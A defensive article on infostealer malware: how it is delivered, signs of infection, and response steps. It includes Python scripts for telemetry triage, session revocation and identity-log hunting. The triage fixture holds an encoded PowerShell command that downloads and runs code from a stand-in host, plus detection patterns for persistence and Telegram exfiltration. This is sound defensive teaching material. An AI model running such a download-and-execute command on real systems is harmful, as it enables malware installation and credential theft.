Infostealer malware has become one of the defining cyber threats of the current moment. It is no longer just a technical nuisance or a low-level malware problem affecting careless users who download the wrong file. It has become a foundational part of the modern cybercrime economy. Infostealers are now routinely used to steal usernames, passwords, browser session cookies, authentication tokens, financial data, crypto wallet information, and other sensitive artifacts that can later be sold, reused, or weaponized in larger attacks. Microsoft’s 2025 Digital Defense Report describes infostealers as a major driver of credential and token theft at scale, while Mandiant reported in 2025 that stolen credentials had become the second most common initial infection vector in its investigations, accounting for 16% of cases.
That helps explain why infostealers are in the media spotlight right now. Security researchers, government agencies, and law enforcement have all been drawing attention to them because they are no longer isolated tools used in one-off cyber incidents. They are feeding a much larger access-for-sale market. In May 2025, Microsoft said it identified more than 394,000 Windows devices globally infected by Lumma malware in just a two-month period, leading to a major takedown effort with law enforcement and industry partners. More recently, Microsoft documented fresh 2026 campaigns using SEO poisoning and fake VPN clients to steal credentials from users searching for legitimate enterprise software.
What infostealer malware is
An infostealer is malware designed primarily to collect valuable information from an infected system and send it back to the attacker. Unlike ransomware, which loudly announces itself by encrypting files and demanding payment, an infostealer often tries to remain quiet. Its job is usually to harvest data, exfiltrate it quickly, and leave behind as little obvious disruption as possible. Microsoft and CISA both describe modern stealers as capable of collecting credentials, tokens, browser data, financial information, crypto wallet data, and other sensitive artifacts from infected endpoints.
That theft can include saved passwords in browsers, autofill data, stored cookies, login sessions, desktop wallet files, email-related credentials, VPN credentials, messaging application data, and system context that helps attackers understand what kind of device they have compromised. Some modern families can also pull data from developer environments, keychains, or application-specific stores. Microsoft’s 2026 research on cross-platform infostealers emphasizes that these threats are no longer limited to traditional Windows credential theft and are increasingly broad, flexible collection tools operating across different operating systems and delivery channels.
Why infostealers matter so much now
The danger of an infostealer is not confined to the infected laptop or workstation. That is the critical point many organizations still miss. If a user’s browser contains saved passwords, active SaaS sessions, VPN access, cloud admin sessions, finance portal access, or business email sessions, one infection can turn into many compromises. Microsoft’s 2025 defense reporting explicitly warns that organizations experiencing an infostealer infection are at high risk of future breaches because the stolen data can later be used for ransomware, data theft, fraud, and extortion.
This is why infostealers have become so useful to criminal groups. One actor can spread the malware, another can package the stolen data into logs, another can sell those logs, and still another can buy the credentials or tokens to conduct follow-on attacks. Huntress reported that infostealers accounted for 24% of incidents in its 2025 Cyber Threat Report, illustrating how common and operationally important they have become in the wider threat landscape.
How infostealers are delivered
Many people still think malware arrives mainly through suspicious attachments and badly written phishing emails. That still happens, but the delivery landscape has become much more polished and deceptive. Microsoft’s 2025 and 2026 reporting shows infostealers being delivered through malvertising, SEO poisoning, fake software installers, malicious CAPTCHA prompts, phishing messages, fake VPN downloads, cracked software, and redirection chains that abuse trusted platforms like GitHub, Dropbox, and other legitimate services.
The LummaC2 advisory from FBI and CISA is especially useful here because it shows how mundane and effective these tactics can be. According to the advisory, threat actors used spearphishing links and attachments, and in some cases used fake CAPTCHA pages that instructed victims to open the Windows Run dialog, paste malicious clipboard content, and launch a Base64-encoded PowerShell command. The encoding hides the command from a casual glance, not from analysis: PowerShell's -EncodedCommand switch takes Base64 of UTF-16LE text, so the command line recorded in process telemetry decodes directly. In other words, many infostealer infections now rely on convincing users to participate in their own compromise.
This is one reason infostealers are so dangerous in ordinary business environments. The attacker does not always need a sophisticated zero-day exploit. Often, a believable lure, a poisoned search result, a fake login page, or a trojanized download is enough.
What attackers are really stealing
The word “credential” can make the threat sound narrower than it really is. Modern infostealers are not just collecting passwords. They are increasingly going after session cookies and authentication tokens as well. That matters because a stolen cookie or token can allow an attacker to impersonate a logged-in user without the password and without triggering MFA, since the session it represents has already passed that check. Microsoft’s reporting consistently emphasizes the theft of credentials, browser session tokens, and system context data, which is part of why infostealers have become so valuable to follow-on attackers.
This helps explain the shift from “malware incident” to “identity incident.” If the malware steals an active browser session tied to email, cloud storage, a CRM, a payroll portal, or a privileged admin console, the problem is no longer limited to the infected device. It becomes an access control problem that may extend across the whole organization. Microsoft’s reporting on token theft and cookie abuse in adjacent campaigns shows how attackers can turn session theft into business email compromise, financial fraud, and other downstream abuse.
Signs of an infostealer infection
Infostealers are often designed to be quiet, so there is not always a dramatic pop-up or a visible crash that announces the infection. In many cases, the most obvious warning signs appear after the malware has already done its work. One common indicator is unexplained account activity: forced logouts, password reset emails you did not request, MFA prompts you did not initiate, strange messages sent from your email or chat accounts, or new sign-ins from unfamiliar devices or locations. These downstream effects are consistent with what Microsoft and Mandiant describe as the growing use of stolen credentials and tokens for initial access and later-stage compromise.
Another warning sign is suspicious behavior tied to software installation or browsing activity. A user may have downloaded a fake installer, clicked through a malicious ad chain, visited a poisoned search result, interacted with a fake CAPTCHA prompt, or installed software that looked legitimate but behaved oddly. Microsoft’s research on Lumma, fake VPN clients, and large-scale malvertising campaigns all point to these deceptive delivery paths as common real-world infection triggers.
On the endpoint itself, defenders may see suspicious PowerShell usage, unusual child processes launched from browsers or document viewers, new scheduled tasks or Run key persistence, odd outbound connections to unfamiliar domains, browser data access at unusual times, or Python interpreters and signed binaries being abused in ways that do not fit the user’s normal workflow. Microsoft’s 2026 reporting on Python-based stealers notes persistence via registry Run keys or scheduled tasks, use of obfuscated scripts, malware masquerading as trusted processes, and exfiltration via legitimate platforms like Telegram.
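The two endpoint-side patterns described above, the fake CAPTCHA chain that ends in an encoded PowerShell command launched from the Run dialog and the persistence and exfiltration indicators listed in the paragraph just before this one, can be turned into a small triage pass over process, registry and network telemetry. The script below is an added example, not code from this article, Microsoft, FBI or CISA. The event records are constructed for the example and their field names (type, image, parent, cmd, target, details, dest_host) are assumptions loosely modelled on Sysmon-style events; adapt them to whatever your EDR or SIEM exports. It decodes the -EncodedCommand payload, flags script hosts whose parent is explorer.exe (the Run dialog's parent), binaries started by browsers or document viewers from the user profile, Run key and scheduled-task persistence, and outbound connections to Telegram from a non-system binary.

```python
import base64
import re

# Constructed endpoint telemetry modelled loosely on Sysmon-style process, registry and
# network events. Nothing here is from a real incident; hosts, paths and URLs are invented.
ENCODED = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/p')".encode("utf-16-le")
).decode()

EVENTS = [
    # ClickFix-style chain: the user pasted the clipboard into Win+R, so explorer.exe is the parent
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -w hidden -nop -ep bypass -enc " + ENCODED},
    # Fake installer launched straight from the browser's download
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Temp\vpn-setup.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmd": "vpn-setup.exe /S"},
    # Persistence via a Run key and a scheduled task
    {"type": "registry", "image": r"C:\Users\u\AppData\Local\Temp\vpn-setup.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\u\AppData\Roaming\svchost.exe"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Users\u\AppData\Local\Temp\vpn-setup.exe",
     "cmd": r"schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\Users\u\AppData\Roaming\svchost.exe"},
    # Exfiltration over a legitimate platform
    {"type": "network", "image": r"C:\Users\u\AppData\Roaming\svchost.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    # Benign, for contrast: an admin script run by the task scheduler service
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "winword.exe", "outlook.exe", "acrord32.exe"}
# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the value is Base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the plaintext behind an -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Walk the events once and return (finding_kind, detail) pairs worth an analyst's time."""
    findings = []
    for ev in events:
        img, parent = basename(ev["image"]), basename(ev.get("parent", ""))
        if ev["type"] == "process":
            decoded = decode_encoded_command(ev["cmd"])
            if img in SCRIPT_HOSTS and parent == "explorer.exe" and decoded is not None:
                findings.append(("run_dialog_encoded_powershell", decoded))
            elif parent in USER_FACING_PARENTS and (
                "\\temp\\" in ev["image"].lower() or "\\appdata\\" in ev["image"].lower()
            ):
                # A lead to review, not a verdict: users do run downloaded installers
                findings.append(("user_app_launched_binary_from_profile", ev["image"]))
            if img == "schtasks.exe" and "/create" in ev["cmd"].lower():
                findings.append(("scheduled_task_created", ev["cmd"]))
        elif ev["type"] == "registry" and "\\currentversion\\run\\" in ev["target"].lower():
            findings.append(("run_key_persistence", ev["details"]))
        elif ev["type"] == "network" and ev["dest_host"].lower().endswith("telegram.org"):
            findings.append(("exfil_over_legitimate_platform", f"{img} -> {ev['dest_host']}"))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(EVENTS):
        print(f"{kind:40} {detail}")
```

The decoded command is the most useful artifact the chain leaves behind, because it usually names the staging URL and the next payload; record it before reimaging. The benign last event shows why the parent process matters: the same powershell.exe under svchost.exe with a -File argument produces no finding.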
There may also be subtle business-side signs rather than overt technical ones. Finance may see unusual login activity in banking or payment systems. Help desks may receive a sudden spike in “I got logged out” or “my MFA looks strange” complaints. Leadership may notice suspicious email forwarding rules, odd cloud access patterns, or vendors reporting strange messages from your domain. In an infostealer case, those soft warning signals often matter just as much as antivirus alerts because the attacker’s real objective is usually unauthorized access, not immediate disruption. This conclusion is supported by Microsoft’s repeated warning that infostealer infections often serve as a precursor to future breach activity.
Real-world attack chain examples
A useful way to understand infostealers is to stop thinking of them as standalone malware and start thinking of them as an early stage in a larger attack chain.
In one documented pattern, a user searches online for legitimate software, such as a VPN client or business tool. Because of SEO poisoning, they land on an attacker-controlled site that offers what appears to be the desired software. The user downloads a ZIP file or installer, runs it, and unknowingly launches a trojanized payload. Microsoft documented exactly this type of 2026 campaign, where fake VPN clients were distributed through poisoned search results and used to harvest VPN credentials. The initial “software download” may look mundane, but the real goal is to steal access that can later be reused.
In another pattern, a user visits an illegal streaming site or another risky web property and encounters malicious advertising redirects. Microsoft reported a large-scale 2025 malvertising campaign that impacted nearly one million devices globally. Victims were redirected through intermediary infrastructure to repositories on GitHub and other platforms that delivered multi-stage malware. From there, the payload chain collected system data, established a foothold, and exfiltrated information. This is a powerful example because it shows how quickly web browsing behavior can turn into credential theft at large scale.
A third pattern begins with phishing. The user receives a plausible email, clicks a link or opens an attachment, and executes the malware. In Lumma-related activity described by FBI and CISA, threat actors also used fake CAPTCHA instructions that convinced users to paste malicious content into the Run dialog, launching PowerShell-based execution. Once the malware runs, it collects credentials, browser data, and other artifacts. Those stolen artifacts may then be sold or handed off to another actor, who later uses them for cloud access, BEC, or ransomware staging.
A fourth pattern is the cross-platform expansion now being reported more openly. Microsoft’s February 2026 research described infostealer activity expanding beyond classic Windows delivery models into macOS and Python-based campaigns, including the abuse of trusted applications and utilities such as PDF tools and messaging platforms. That matters because many organizations still defend as though infostealers are mainly a Windows browser-password problem, when in reality the threat surface now includes mixed operating systems, scripting languages, consumer apps, and trusted services.
Why infostealers often lead to bigger incidents
One of the biggest misconceptions in incident response is the idea that if the malware is removed, the danger is over. With an infostealer, that is often false. Once passwords, cookies, and tokens have been exfiltrated, reimaging the machine may remove the malware but it does not invalidate the stolen access. Microsoft’s defense reporting is explicit on this point: organizations that experience an infostealer infection are at high risk of later breaches.
That later breach might take several forms. It could be a business email compromise event using a hijacked mailbox. It could be unauthorized cloud access through stolen sessions. It could be fraud against customers or vendors. It could be an access broker selling the foothold onward to a ransomware affiliate. Microsoft’s Lumma reporting specifically noted that ransomware actors have used the stealer in campaigns, reinforcing the point that the infostealer is often the beginning of a broader attack path, not the end.
What a business should do when it suspects an infostealer incident
The first priority is containment of the affected device. That means isolating the host, preserving relevant telemetry where possible, and preventing further outbound communication. But containment alone is not enough. Because infostealers target identity material, the response must immediately expand beyond the device and into the user’s account footprint. That broader mindset is consistent with Microsoft’s framing of infostealer infections as future-breach risks and with Mandiant’s findings on the role of stolen credentials in initial access.
The second priority is credential and session response. Businesses should identify every meaningful account used from the infected system, especially email, VPN, cloud services, finance platforms, password managers, developer platforms, collaboration tools, and privileged administrative consoles. Password resets should be accompanied by session revocation and forced sign-outs wherever possible, since stolen cookies and tokens may otherwise remain usable until they expire. Resets and revocations should be performed from a known-clean device, since anything typed on the infected host may be captured again. That follows directly from Microsoft’s emphasis on token and session theft as part of the infostealer problem.
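Why a password reset alone leaves stolen sessions alive, and what revocation actually changes, is easier to see in a toy model than in prose. The block below is an added illustration, not code from this article or from any identity provider: it models sessions as signed tokens carrying an issued-at time, and models revocation the way many providers implement it, as a per-user "not before" mark that rejects anything issued earlier. The signing key, the clock and the scenario are constructed for the example; real providers differ in detail (some also invalidate refresh tokens on password change, browser cookies and access tokens typically survive until expiry), so treat this as the shape of the check, not any vendor's behaviour.

```python
import base64
import hashlib
import hmac
import json

# Constructed signing key for the illustration only; never hard-code one in real code.
SECRET = b"constructed-signing-key-for-illustration-only"
TOKEN_TTL = 8 * 3600  # seconds a session stays valid if nothing revokes it


class Sessions:
    """Toy identity-provider session store with an injected clock (seconds since epoch)."""

    def __init__(self, now):
        self.now = now
        self.password_hash = {}   # user -> stand-in for the credential store
        self.valid_from = {}      # user -> earliest issued-at time still accepted

    def set_password(self, user, password):
        self.password_hash[user] = hashlib.sha256(password.encode()).hexdigest()

    def issue(self, user):
        """Mint a session token: base64(claims).base64(HMAC-SHA256 over claims)."""
        body = json.dumps({"sub": user, "iat": self.now, "exp": self.now + TOKEN_TTL}).encode()
        sig = hmac.new(SECRET, body, hashlib.sha256).digest()
        return base64.urlsafe_b64encode(body).decode() + "." + base64.urlsafe_b64encode(sig).decode()

    def validate(self, token):
        try:
            b64_body, b64_sig = token.split(".")
            body = base64.urlsafe_b64decode(b64_body)
            sig = base64.urlsafe_b64decode(b64_sig)
        except ValueError:
            return False
        if not hmac.compare_digest(sig, hmac.new(SECRET, body, hashlib.sha256).digest()):
            return False
        claims = json.loads(body)
        if claims["exp"] <= self.now:
            return False
        # The revocation check: a token issued before the user's not-before mark is dead,
        # however good its signature and however far away its expiry.
        return claims["iat"] >= self.valid_from.get(claims["sub"], 0)

    def reset_password(self, user, new_password):
        # Changes the credential only; sessions already minted from it are untouched.
        self.set_password(user, new_password)

    def revoke_sessions(self, user):
        # Everything issued before this moment is invalid from here on.
        self.valid_from[user] = self.now


def walk_through():
    """Replay the incident: stealer lifts a token, help desk resets the password, then revokes."""
    idp = Sessions(now=1_000)
    idp.set_password("alice", "old-password")
    stolen = idp.issue("alice")                 # the cookie/token the stealer exfiltrated
    idp.now += 600
    idp.reset_password("alice", "new-password")
    stolen_after_reset = idp.validate(stolen)   # still True: the reset touched nothing the token depends on
    idp.now += 600
    idp.revoke_sessions("alice")
    idp.now += 1
    stolen_after_revoke = idp.validate(stolen)  # False: issued before the not-before mark
    fresh = idp.issue("alice")                  # the user signs back in from a clean device
    return {
        "stolen_after_reset": stolen_after_reset,
        "stolen_after_revoke": stolen_after_revoke,
        "fresh_after_revoke": idp.validate(fresh),
    }


if __name__ == "__main__":
    print(walk_through())
```

The order of operations in walk_through is the one to keep in the playbook: reset the password, then revoke sessions, then let the user sign in again from a clean device. Skipping the revocation step leaves the attacker's copy of the session valid for the remainder of its lifetime, which for long-lived browser sessions can be days.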
The third priority is hunting for downstream misuse. Security teams should review sign-in logs, MFA events, impossible travel alerts, suspicious OAuth grants, newly registered devices, mailbox rule changes, unusual cloud console activity, and suspicious administrative actions. The point is not merely to confirm that malware ran. The point is to determine whether stolen access has already been used elsewhere in the environment. Microsoft’s reporting on identity-centric attacks and stolen credentials strongly supports this approach.
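Three of the hunts listed above, impossible travel, sign-ins from devices the user has never used, and newly created mailbox rules that forward or delete mail, are straightforward to run over exported identity and mailbox logs. The block below is an added example, not code from this article or from Microsoft; the sign-in, device and mailbox-rule records are constructed for it and their field names (user, time, ip, lat, lon, device, ok, forward_to, delete) are assumptions about what an identity provider and mail platform export. It uses the great-circle distance between consecutive successful sign-ins divided by the elapsed time, flags anything faster than a commercial flight, and scopes the device and mailbox-rule checks to the window after the suspected infection time.

```python
import math
from datetime import datetime

# Constructed records, not real tenant data. Coordinates are the geolocation the
# identity provider attached to each sign-in IP; the IPs are documentation ranges.
INFECTION_TIME = datetime.fromisoformat("2026-03-02T08:30:00+00:00")
ORG_DOMAIN = "corp.example"

SIGNINS = [
    {"user": "alice", "time": "2026-03-02T09:00:00+00:00", "ip": "203.0.113.10",
     "lat": 52.52, "lon": 13.40, "device": "LAPTOP-A1", "ok": True},
    {"user": "alice", "time": "2026-03-02T09:40:00+00:00", "ip": "198.51.100.7",
     "lat": 40.71, "lon": -74.01, "device": "UNKNOWN-7f3", "ok": True},
    {"user": "bob", "time": "2026-03-02T08:00:00+00:00", "ip": "203.0.113.11",
     "lat": 52.52, "lon": 13.40, "device": "LAPTOP-B2", "ok": True},
    {"user": "bob", "time": "2026-03-02T12:00:00+00:00", "ip": "203.0.113.12",
     "lat": 48.86, "lon": 2.35, "device": "LAPTOP-B2", "ok": True},
]
KNOWN_DEVICES = {"alice": {"LAPTOP-A1"}, "bob": {"LAPTOP-B2"}}
MAILBOX_RULES = [
    {"user": "alice", "name": ".", "created": "2026-03-02T09:45:00+00:00",
     "forward_to": "collector@mail.example.invalid", "delete": True},
    {"user": "bob", "name": "Newsletters", "created": "2026-02-10T10:00:00+00:00",
     "forward_to": None, "delete": False},
]


def ts(s):
    return datetime.fromisoformat(s)


def km_between(a, b):
    """Haversine great-circle distance in kilometres between (lat, lon) pairs."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = math.sin((lat2 - lat1) / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def impossible_travel(signins, max_kmh=900.0):
    """Consecutive successful sign-ins per user that imply faster-than-airliner movement."""
    by_user = {}
    for s in sorted(signins, key=lambda s: s["time"]):
        if s["ok"]:
            by_user.setdefault(s["user"], []).append(s)
    hits = []
    for user, rows in by_user.items():
        for prev, cur in zip(rows, rows[1:]):
            hours = (ts(cur["time"]) - ts(prev["time"])).total_seconds() / 3600
            dist = km_between((prev["lat"], prev["lon"]), (cur["lat"], cur["lon"]))
            if hours > 0 and dist / hours > max_kmh:
                hits.append((user, cur["ip"], round(dist), round(dist / hours)))
    return hits


def new_devices_since(signins, known, since):
    """Successful sign-ins after the infection window from a device the user has not used before."""
    return [(s["user"], s["device"]) for s in signins
            if s["ok"] and ts(s["time"]) >= since and s["device"] not in known.get(s["user"], set())]


def suspicious_rules(rules, since, org_domain):
    """Rules created after the infection window that forward outside the org or delete mail."""
    hits = []
    for r in rules:
        fwd = r.get("forward_to")
        external = fwd is not None and not fwd.lower().endswith("@" + org_domain)
        if ts(r["created"]) >= since and (external or r.get("delete")):
            hits.append((r["user"], r["name"], fwd))
    return hits


def hunt(signins, known, rules, since):
    return {
        "impossible_travel": impossible_travel(signins),
        "new_devices": new_devices_since(signins, known, since),
        "mailbox_rules": suspicious_rules(rules, since, ORG_DOMAIN),
    }


if __name__ == "__main__":
    for k, v in hunt(SIGNINS, KNOWN_DEVICES, MAILBOX_RULES, INFECTION_TIME).items():
        print(k, v)
```

In the constructed data alice trips all three checks (a second sign-in from an unknown device, an implied speed in the thousands of km/h, and a one-character-named rule forwarding mail outside the organisation), while bob's Berlin-to-Paris pair four hours apart is ordinary travel. Note the conditions a simple implementation misses: sign-ins from a VPN exit node or cloud IP will geolocate wherever that provider is, so an impossible-travel hit is a lead to confirm against device identity and user-agent, not a verdict on its own.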
The fourth priority is scoping and communication. If the infected user had access to sensitive data, customer systems, financial workflows, regulated environments, or critical infrastructure, the organization should assess whether notification, legal review, or regulator engagement may be needed. FBI and CISA’s LummaC2 advisory also encourages organizations to document the scope and status of infection, estimated loss, dates, and indicators when reporting.
A practical business checklist for responding to infostealer incidents
A useful checklist starts with one basic principle: treat the case as both a malware incident and an identity compromise.
1. Isolate the suspected endpoint and preserve relevant logs, alerts, and telemetry.
2. Determine what the user accessed from that device, including business email, VPN, cloud platforms, admin portals, developer tools, password managers, and financial systems.
3. Reset passwords for exposed accounts and revoke active sessions and tokens wherever feasible.
4. Review MFA settings, recovery options, forwarding rules, OAuth consents, and device registrations for suspicious changes.
5. Hunt across identity and cloud logs for unusual sign-ins, geographic anomalies, impossible travel, mass downloads, and abnormal privilege use.
6. Assess whether lateral movement, data access, or follow-on malware occurred after the initial infection.
7. Reimage or rebuild the device rather than relying on a narrow cleanup.
8. Review the infection path so the same method cannot be reused, whether that path was phishing, malvertising, fake software, or poisoned search results.
9. Brief leadership in plain language that the real risk is stolen access, not just malware execution.
10. Document lessons learned and tune controls around software sourcing, browser storage, user awareness, endpoint telemetry, and identity monitoring.
This response model aligns with Microsoft’s warning about future breaches after infostealer infections and with FBI/CISA guidance to test and tune defenses against the observed ATT&CK techniques.
How businesses can reduce the risk before an incident happens
The most effective defenses are layered. Businesses should reduce unnecessary password storage in browsers, use phishing-resistant MFA where possible, restrict the execution of untrusted software, improve endpoint visibility, and watch identity logs as closely as endpoint alerts. Security awareness also needs to evolve. Employees should be warned not only about attachments and suspicious links, but also about fake software downloads, poisoned search results, malicious ads, fake CAPTCHA prompts, and trojanized installers. Microsoft’s 2025 and 2026 research makes clear that those delivery paths are now central to the problem.
Organizations should also revisit the old habit of treating credential theft and endpoint malware as separate disciplines. Infostealers bridge those worlds. They are endpoint threats that become identity threats almost immediately. That means security operations, identity teams, IT, and incident response need to work from the same playbook. The businesses that still respond as though “malware cleanup” ends the incident are the ones most likely to be surprised later by account takeover, fraud, or ransomware.
Final thoughts
Infostealer malware is getting so much attention because it represents something larger than one malware family or one campaign. It reflects a mature cybercriminal model built around stealing access, packaging that access, and turning it into money through fraud, resale, extortion, and follow-on compromise. It is quiet, scalable, and efficient. It often does not announce itself until the stolen credentials or sessions are used later in a different attack. That is exactly why it deserves executive attention, business planning, and a more serious response than many organizations have given it in the past.